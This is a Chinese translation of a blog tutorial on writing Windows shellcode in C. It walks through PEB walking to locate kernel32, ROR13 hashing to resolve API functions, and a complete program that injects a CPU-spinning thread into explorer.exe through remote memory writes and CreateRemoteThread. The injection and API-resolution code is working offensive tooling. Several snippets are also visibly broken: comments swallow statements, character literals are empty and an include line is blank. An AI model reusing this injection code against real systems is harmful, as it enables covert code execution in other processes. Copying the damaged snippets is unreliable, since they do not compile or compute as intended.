背景

有時(shí)候程序員們需要寫一段獨(dú)立于位置操作的代碼，可當(dāng)作一段數(shù)據(jù)寫到其他進(jìn)程或者網(wǎng)絡(luò)中去。該類型代碼在它誕生之初就被稱為shellcode，在軟件利用中黑客們以此獲取到shell權(quán)限。方法就是通過這樣或那樣的惡意手法使得這段代碼得以執(zhí)行，完成它的使命。當(dāng)然了，該代碼僅能靠它自己，作者無法使用現(xiàn)代軟件開發(fā)的實(shí)踐來推進(jìn)shellcode的編寫。

匯編常用于編寫shellcode，特別是對(duì)代碼大小挑剔的時(shí)候，匯編就是不錯(cuò)的選擇。對(duì)我個(gè)人而言，多數(shù)項(xiàng)目都需要一段類似可以注入到其他進(jìn)程的代碼。這時(shí)候我就不是特別在意代碼大小了，反而是開發(fā)效率以及調(diào)試能力顯得尤為重要。一開始，我用NASM編寫?yīng)毩⒌膮R編程序，把獲得的輸出文件轉(zhuǎn)換為C數(shù)組，然后整合到我的程序中。這正是你在milw0rm這樣的網(wǎng)站上所看到的，大多數(shù)exploit payload的獲取方式。最終我厭倦了這樣的方式，雖然很懷念NASM完備的功能，我還是開始使用內(nèi)聯(lián)匯編來解決問題。隨著經(jīng)驗(yàn)的積累，我發(fā)現(xiàn)了一個(gè)完全可用的純C開發(fā)shellcode的方法，僅需2條內(nèi)聯(lián)匯編指令。就開發(fā)速度和調(diào)試shellcode時(shí)的上下文而言，真的比單純使用匯編的方法有很大的改進(jìn)。運(yùn)用機(jī)器級(jí)的比如ollydbg這樣的調(diào)試器，我毫不含糊，但這相對(duì)于用Visual Studio調(diào)試器來調(diào)試C源碼，就是小菜一碟。

準(zhǔn)備工作

為了確保能生成可用作shellcode這樣特定格式的代碼，我們需要對(duì)Visual Studio做些特殊的配置。下面的各項(xiàng)配置，可能隨編譯器的變更而變更：

1、使用Release模式。近來編譯器的Debug模式可能產(chǎn)生逆序的函數(shù)，并且會(huì)插入許多與位置相關(guān)的調(diào)用。

2、禁用優(yōu)化。編譯器會(huì)默認(rèn)優(yōu)化那些沒有使用的函數(shù)，而那可能正是我們所需要的。

3、禁用棧緩沖區(qū)安全檢查(/Gs)。在函數(shù)頭尾所調(diào)用的棧檢查函數(shù)，存在于二進(jìn)制文件的某個(gè)特定位置，導(dǎo)致輸出的函數(shù)不能重定位，這對(duì)shellcode是無意義的。

第一個(gè)shellcode

#include 
void shell_code() 
{ 
for (;;); 
} 
void __declspec(naked) END_SHELLCODE(void) {} 
int main(int argc, char *argv[]) 
{ 
int sizeofshellcode = (int)END_SHELLCODE - (int)shell_code; 
// Show some info about our shellcode buffer printf("Shellcode starts at %p and is %d bytes long", shell_code. sizeofshellcode); 
// Now we can test out the shellcode by calling it from C! shell_code(); 
return 0; 
} 

這里所示例的shellcode除了一個(gè)無限循環(huán)，啥事也沒干。不過有一點(diǎn)是比較重要的————放在shell_code函數(shù)之后的END_SHELLCODE。有了這個(gè)，我們就能通過shell_code函數(shù)開頭和END_SHELLCODE函數(shù)開頭間的距離來確定shellcode的長(zhǎng)度了。還有，C語言在這里所體現(xiàn)的好處就是我們能夠把程序本身當(dāng)作一段數(shù)據(jù)來訪問，所以如果我們需要把shellcode寫到另外一份文件中，僅需簡(jiǎn)單的調(diào)用fwrite(shell_code, sizeofshellcode, 1, filehandle)。

Visual Studio環(huán)境中，通過調(diào)用shell_code函數(shù)，借助IDE的調(diào)試技能，就可以很容易的調(diào)試shellcode了。

在上面所示的第一個(gè)小案例中，shellcode僅用了一個(gè)函數(shù)，其實(shí)我們可以使用許多函數(shù)。只是所有的函數(shù)需要連續(xù)地存放在shell_code函數(shù)和END_SHELLCODE函數(shù)之間，這是因?yàn)楫?dāng)在內(nèi)部函數(shù)間調(diào)用時(shí)，call指令總是相對(duì)的。call指令的意思是“從距這里X字節(jié)的地方調(diào)用一個(gè)函數(shù)”。所以如果我們把執(zhí)行call的代碼和被調(diào)用的代碼都拷貝到其他地方，同時(shí)又保證了它們間的相對(duì)距離，那么鏈接時(shí)就不會(huì)出岔子。

Shellcode中數(shù)據(jù)的使用

傳統(tǒng)C源碼中，如果要用一段諸如ASCII字符的數(shù)據(jù)，可以直接內(nèi)嵌進(jìn)去，無需擔(dān)心數(shù)據(jù)的存放，比如: WinExec(“evil.exe”)。這里的“evil.exe”字符串被存儲(chǔ)在C程序的靜態(tài)區(qū)域(很可能是二進(jìn)制的.rdata節(jié)中)，如果我們把這段代碼拷貝出來，試圖將其注入到其他進(jìn)程中，就會(huì)因那段字符不存在于其他進(jìn)程的特定位置而失敗。傳統(tǒng)匯編編寫的shellcode可以輕松的使用數(shù)據(jù)，這通過使用call指令獲取到指向代碼本身的指針，而這段代碼可能就混雜著數(shù)據(jù)。下面是一個(gè)使用匯編實(shí)現(xiàn)的shellcode方式的WinExec調(diào)用：

call end_of_string 
db 'evil.exe',0 
end_of_string: 
call WinExec 

這里的第一個(gè)call指令跳過字符數(shù)據(jù)”evial.exe”，同時(shí)在棧頂存放了一個(gè)指向字符串的指針，稍后會(huì)被用作WinExec函數(shù)的參數(shù)。這種新穎的使用數(shù)據(jù)的方法有著很高的空間利用率，但是很可惜在C語言中沒有與此等價(jià)的直接調(diào)用。在用C寫shellcode時(shí)，我建議使用棧區(qū)來存放和使用字符串。為了使微軟編譯器在棧上動(dòng)態(tài)的分配字符以便重定位，你需要如下處理：

char mystring[] = {'e','v','i','l','.','e','x','e',0}; 
winexec(mystring); 

你會(huì)發(fā)現(xiàn)，我將字符串聲明為字符數(shù)組的形式。如果我這樣寫char mystring[] = “evil.exe”; 在老式的微軟編譯器中，它會(huì)通過一系列的mov指令來構(gòu)成字符串，而現(xiàn)在僅會(huì)簡(jiǎn)單的將字符串從內(nèi)存中的固定位置拷貝到棧中，而如果需要重定位代碼，這就無效了。把兩種方法都試試，下載免費(fèi)的IDA Pro版本看看它們的反匯編代碼。上面的賦值語句的反匯編應(yīng)該看起來如下所示：

mov [ebp+mystring], 65h 
mov [ebp+mystring+1], 76h 
mov [ebp+mystring+2], 69h 
mov [ebp+mystring+3], 6Ch 
mov [ebp+mystring+4], 2Eh 
mov [ebp+mystring+5], 65h 
mov [ebp+mystring+6], 78h 
mov [ebp+mystring+7], 65h 
mov [ebp+mystring+8], 0 

處理數(shù)據(jù)時(shí)，字符串真的是很頭疼的一件事。其他比如結(jié)構(gòu)體、枚舉、typedef聲明、函數(shù)指針啊這些，都能如你預(yù)期的那樣正常工作，你可以利用C提供的全套功能。確保數(shù)據(jù)為局部變量，一切都OK了。

使用庫函數(shù)

我將這篇文章專注于Windows環(huán)境的shellcode。上面所提及的一些規(guī)則也適用于Unix系統(tǒng)。Windows環(huán)境下的shellcode會(huì)更復(fù)雜一點(diǎn)，因?yàn)槲覀儧]有一致公開的方法進(jìn)行系統(tǒng)調(diào)用，就像在Unix中僅需幾條匯編代碼就可以的那樣(對(duì)int 80h的調(diào)用)。我們需要利用DLL中提供的API函數(shù)，來進(jìn)行系統(tǒng)調(diào)用做些像讀寫文件、網(wǎng)絡(luò)通信這樣的事。這些DLL最終會(huì)進(jìn)行必要的系統(tǒng)調(diào)用，而它的實(shí)現(xiàn)細(xì)節(jié)幾乎隨著每次Windows的發(fā)布而變化。像《The Shellcoder’s Handbook》這樣的標(biāo)榜性著作描繪了搜尋內(nèi)存中DLL和函數(shù)的方法。如果想將shellcode做到在不同Windows版本間的可移植性，有兩個(gè)函數(shù)是必須的：1、查找kernel32.dll的函數(shù);2、實(shí)現(xiàn)GetProcAddress()函數(shù)或者查找GetProcAddress()地址的函數(shù)。我所提供的實(shí)現(xiàn)是基于hash的而非字符串的比較，下面我將提供用于shellcode的hash實(shí)現(xiàn)，并做個(gè)簡(jiǎn)短的說明。

Hash函數(shù)

在shellcode中，使用hash進(jìn)行函數(shù)的查詢是比較普遍的。較流行的ROR13 hash方法是最常用的，它的實(shí)現(xiàn)也用在了《The Shellcoder’s Handbook》中。它的基本思想是當(dāng)我們要查詢一個(gè)名為“MyFunction”的函數(shù)時(shí)，不是將字符串存放在內(nèi)存中，對(duì)每個(gè)函數(shù)名進(jìn)行字符串的比對(duì)，而是生成一個(gè)32位的hash值，將每個(gè)函數(shù)名進(jìn)行hash比對(duì)。這并不能減小運(yùn)行時(shí)間，但是可以節(jié)省shellcode的空間，也具有一定的反逆向功效。下面我提供了ASCII和Unicode版本的ROR13 hash實(shí)現(xiàn)：

DWORD __stdcall unicode_ror13_hash(const WCHAR *unicode_string) 
{ 
DWORD hash = 0; 
while (*unicode_string != 0) 
{ 
DWORD val = (DWORD)*unicode_string++; 
hash = (hash >> 13) | (hash << 19); // ROR 13 hash += val; 
} 
return hash; 
} 
DWORD __stdcall ror13_hash(const char *string) 
{ 
DWORD hash = 0; 
while (*string) { 
DWORD val = (DWORD) *string++; 
hash = (hash >> 13)|(hash << 19); // ROR 13 hash += val; 
} 
return hash; 
} 

查找DLL

有3個(gè)鏈表可以用來描述內(nèi)存中加載的DLL：

InMemoryOrderModuleList、InInitializationOrderModuleList和InLoadOrderModuleList。它們都在PEB(進(jìn)程環(huán)境塊)中。在你的shellcode中，用哪個(gè)都可以，我所用的是InMemoryOrderModuleList。需要如下的兩條內(nèi)聯(lián)匯編來訪問PEB:

PPEB __declspec(naked) get_peb(void) 
{ 
__asm { 
mov eax, fs:[0x30] 
ret 
} 
} 

現(xiàn)在我們已經(jīng)獲取了PEB，可以查詢內(nèi)存中的DLL了。唯一的一直存在于Windows進(jìn)程內(nèi)存中的DLL是ntdll.dll，但kernel32.dll會(huì)更方便一點(diǎn)，并且在99.99%的Windows進(jìn)程中(Win32子系統(tǒng))都可用。下面我提供的代碼實(shí)現(xiàn)會(huì)查詢module列表，利用unicode的ROR13 hash值查到kernel32.dll。

HMODULE __stdcall find_kernel32(void) 
{ 
return find_module_by_hash(0x8FECD63F); 
} 
HMODULE __stdcall find_module_by_hash(DWORD hash) 
{ 
PPEB peb; 
LDR_DATA_TABLE_ENTRY *module_ptr, *first_mod; 
peb = get_peb(); 
module_ptr = (PLDR_DATA_TABLE_ENTRY)peb->Ldr->InMemoryOrderModuleList.Flink; 
first_mod = module_ptr; 
do { 
if (unicode_ror13_hash((WCHAR *)module_ptr->FullDllName.Buffer) == hash) 
return (HMODULE)module_ptr->Reserved2[0]; 
else 
module_ptr = (PLDR_DATA_TABLE_ENTRY)module_ptr->Reserved1[0]; 
} while (module_ptr && module_ptr != first_mod); // because the list wraps, 
return INVALID_HANDLE_VALUE; 
} 

這里所提供的find_module_by_hash函數(shù)可以利用dll名稱的hash值找到任意的加載在內(nèi)存中的DLL。如果要加載一個(gè)新的原本不再內(nèi)存中的DLL，就需要使用kernel32.dll中的LoadLibrary函數(shù)。要找到LoadLibrary函數(shù)，我們就需要實(shí)現(xiàn)GetProcAddress函數(shù)。下面的代碼實(shí)現(xiàn)利用函數(shù)名的hash值在加載的dll中查找函數(shù)：

FARPROC __stdcall find_function(HMODULE module, DWORD hash) 
{ 
IMAGE_DOS_HEADER *dos_header; 
IMAGE_NT_HEADERS *nt_headers; 
IMAGE_EXPORT_DIRECTORY *export_dir; 
DWORD *names, *funcs; 
WORD *nameords; 
int i; 
dos_header = (IMAGE_DOS_HEADER *)module; 
nt_headers = (IMAGE_NT_HEADERS *)((char *)module + dos_header->e_lfanew); 
export_dir = (IMAGE_EXPORT_DIRECTORY *)((char *)module + nt_headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress); 
names = (DWORD *)((char *)module + export_dir->AddressOfNames); 
funcs = (DWORD *)((char *)module + export_dir->AddressOfFunctions); 
nameords = (WORD *)((char *)module + export_dir->AddressOfNameOrdinals); 
for (i = 0; i < export_dir->NumberOfNames; i++) 
{ 
char *string = (char *)module + names[i]; 
if (hash == ror13_hash(string)) 
{ 
WORD nameord = nameords[i]; 
DWORD funcrva = funcs[nameord]; 
return (FARPROC)((char *)module + funcrva); 
} 
} 
return NULL; 
} 

現(xiàn)在我們可以這樣查找函數(shù)：

HMODULE kern32 = find_kernel32(); 
FARPROC loadlibrarya = find_function(kern32, 0xEC0E4E8E); // the hash of LoadLibraryA 

最終成品

現(xiàn)在我將以完整的C程序的方式來展示上面所提及的內(nèi)容。代碼執(zhí)行時(shí)，將生成名為shellcode.bin的文件，它就存儲(chǔ)著shellcode。該shellcode可以向explorer.exe注入一個(gè)線程，實(shí)現(xiàn)無限循環(huán)，直至消耗完cpu。

#include <stdio.h> 
#include <Windows.h> 
#include <winternl.h> 
#include <wchar.h> 
#include <tlhelp32.h> 
  
PPEB get_peb(void); 
DWORD __stdcall unicode_ror13_hash(const WCHAR *unicode_string); 
DWORD __stdcall ror13_hash(const char *string); 
HMODULE __stdcall find_module_by_hash(DWORD hash); 
HMODULE __stdcall find_kernel32(void); 
FARPROC __stdcall find_function(HMODULE module, DWORD hash); 
HANDLE __stdcall find_process(HMODULE kern32, const char *procname); 
VOID __stdcall inject_code(HMODULE kern32, HANDLE hprocess, const char *code, DWORD size); 
BOOL __stdcall strmatch(const char *a, const char *b); 
  
void __stdcall shell_code() 
{ 
    HMODULE kern32; 
    DWORD *dwptr; 
    HANDLE hProcess; 
    char procname[] = {'e','x','p','l','o','r','e','r','.','e','x','e',0}; 
    char code[] = {0xEB, 0xFE}; 
  
    kern32 = find_kernel32(); 
    hProcess = find_process(kern32, (char *)procname); 
    inject_code(kern32, hProcess, code, sizeof code); 
} 
  
HANDLE __stdcall find_process(HMODULE kern32, const char *procname) 
{ 
    FARPROC createtoolhelp32snapshot = find_function(kern32, 0xE454DFED); 
    FARPROC process32first = find_function(kern32, 0x3249BAA7); 
    FARPROC process32next = find_function(kern32, 0x4776654A); 
    FARPROC openprocess = find_function(kern32, 0xEFE297C0); 
    FARPROC createprocess = find_function(kern32, 0x16B3FE72); 
    HANDLE hSnapshot; 
    PROCESSENTRY32 pe32; 
  
    hSnapshot = (HANDLE)createtoolhelp32snapshot(TH32CS_SNAPPROCESS, 0); 
    if (hSnapshot == INVALID_HANDLE_VALUE) 
        return INVALID_HANDLE_VALUE; 
  
    pe32.dwSize = sizeof( PROCESSENTRY32 ); 
  
    if (!process32first(hSnapshot, &pe32)) 
        return INVALID_HANDLE_VALUE; 
  
    do 
    { 
        if (strmatch(pe32.szExeFile, procname)) 
        { 
            return openprocess(PROCESS_ALL_ACCESS, FALSE, pe32.th32ProcessID); 
        } 
    } while (process32next(hSnapshot, &pe32)); 
  
    return INVALID_HANDLE_VALUE; 
} 
  
BOOL __stdcall strmatch(const char *a, const char *b) 
{ 
    while (*a != '' && *b != '') 
    { 
        char aA_delta = 'a' - 'A'; 
        char a_conv = *a >= 'a' && *a <= 'z' ? *a - aA_delta : *a; 
        char b_conv = *b >= 'a' && *b <= 'z' ? *b - aA_delta : *b; 
  
        if (a_conv != b_conv) 
            return FALSE; 
        a++; 
        b++; 
    } 
  
    if (*b == '' && *a == '') 
        return TRUE; 
    else 
        return FALSE; 
} 
  
VOID __stdcall inject_code(HMODULE kern32, HANDLE hprocess, const char *code, DWORD size) 
{ 
    FARPROC virtualallocex = find_function(kern32, 0x6E1A959C); 
    FARPROC writeprocessmemory = find_function(kern32, 0xD83D6AA1); 
    FARPROC createremotethread = find_function(kern32, 0x72BD9CDD); 
    LPVOID remote_buffer; 
    DWORD dwNumBytesWritten; 
  
    remote_buffer = virtualallocex(hprocess, NULL, size, MEM_COMMIT, PAGE_EXECUTE_READWRITE); 
    if (remote_buffer == NULL) 
        return; 
  
    if (!writeprocessmemory(hprocess, remote_buffer, code, size, &dwNumBytesWritten)) 
        return; 
  
    createremotethread(hprocess, NULL, 0, remote_buffer, NULL, 0, NULL); 
} 
  
HMODULE __stdcall find_kernel32(void) 
{ 
    return find_module_by_hash(0x8FECD63F); 
} 
  
HMODULE __stdcall find_module_by_hash(DWORD hash) 
{ 
    PPEB peb; 
    LDR_DATA_TABLE_ENTRY *module_ptr, *first_mod; 
  
    peb = get_peb(); 
  
    module_ptr = (PLDR_DATA_TABLE_ENTRY)peb->Ldr->InMemoryOrderModuleList.Flink; 
    first_mod = module_ptr; 
  
    do { 
        if (unicode_ror13_hash((WCHAR *)module_ptr->FullDllName.Buffer) == hash) 
            return (HMODULE)module_ptr->Reserved2[0]; 
        else 
            module_ptr = (PLDR_DATA_TABLE_ENTRY)module_ptr->Reserved1[0]; 
    } while (module_ptr && module_ptr != first_mod);   // because the list wraps, 
  
    return INVALID_HANDLE_VALUE; 
} 
  
PPEB __declspec(naked) get_peb(void) 
{ 
    __asm { 
        mov eax, fs:[0x30] 
        ret 
    } 
} 
  
DWORD __stdcall unicode_ror13_hash(const WCHAR *unicode_string) 
{ 
    DWORD hash = 0; 
  
    while (*unicode_string != 0) 
    { 
        DWORD val = (DWORD)*unicode_string++; 
        hash = (hash >> 13) | (hash << 19); // ROR 13 
        hash += val; 
    } 
    return hash; 
} 
  
DWORD __stdcall ror13_hash(const char *string) 
{ 
    DWORD hash = 0; 
  
    while (*string) { 
        DWORD val = (DWORD) *string++; 
        hash = (hash >> 13)|(hash << 19);  // ROR 13 
        hash += val; 
    } 
    return hash; 
} 
  
FARPROC __stdcall find_function(HMODULE module, DWORD hash) 
{ 
    IMAGE_DOS_HEADER *dos_header; 
    IMAGE_NT_HEADERS *nt_headers; 
    IMAGE_EXPORT_DIRECTORY *export_dir; 
    DWORD *names, *funcs; 
    WORD *nameords; 
    int i; 
  
    dos_header = (IMAGE_DOS_HEADER *)module; 
    nt_headers = (IMAGE_NT_HEADERS *)((char *)module + dos_header->e_lfanew); 
    export_dir = (IMAGE_EXPORT_DIRECTORY *)((char *)module + nt_headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress); 
    names = (DWORD *)((char *)module + export_dir->AddressOfNames); 
    funcs = (DWORD *)((char *)module + export_dir->AddressOfFunctions); 
    nameords = (WORD *)((char *)module + export_dir->AddressOfNameOrdinals); 
  
    for (i = 0; i < export_dir->NumberOfNames; i++) 
    { 
        char *string = (char *)module + names[i]; 
        if (hash == ror13_hash(string)) 
        { 
            WORD nameord = nameords[i]; 
            DWORD funcrva = funcs[nameord]; 
            return (FARPROC)((char *)module + funcrva); 
        } 
    } 
  
    return NULL; 
} 
  
void __declspec(naked) END_SHELLCODE(void) {} 
  
int main(int argc, char *argv[]) 
{ 
    FILE *output_file = fopen("shellcode.bin", "w"); 
    fwrite(shell_code, (int)END_SHELLCODE - (int)shell_code, 1, output_file); 
    fclose(output_file); 
  
    return 0; 
} 

來源聲明：本文來自Nick Harbour的博文《Writing Shellcode with a C Compiler》，由IDF實(shí)驗(yàn)室徐文博翻譯。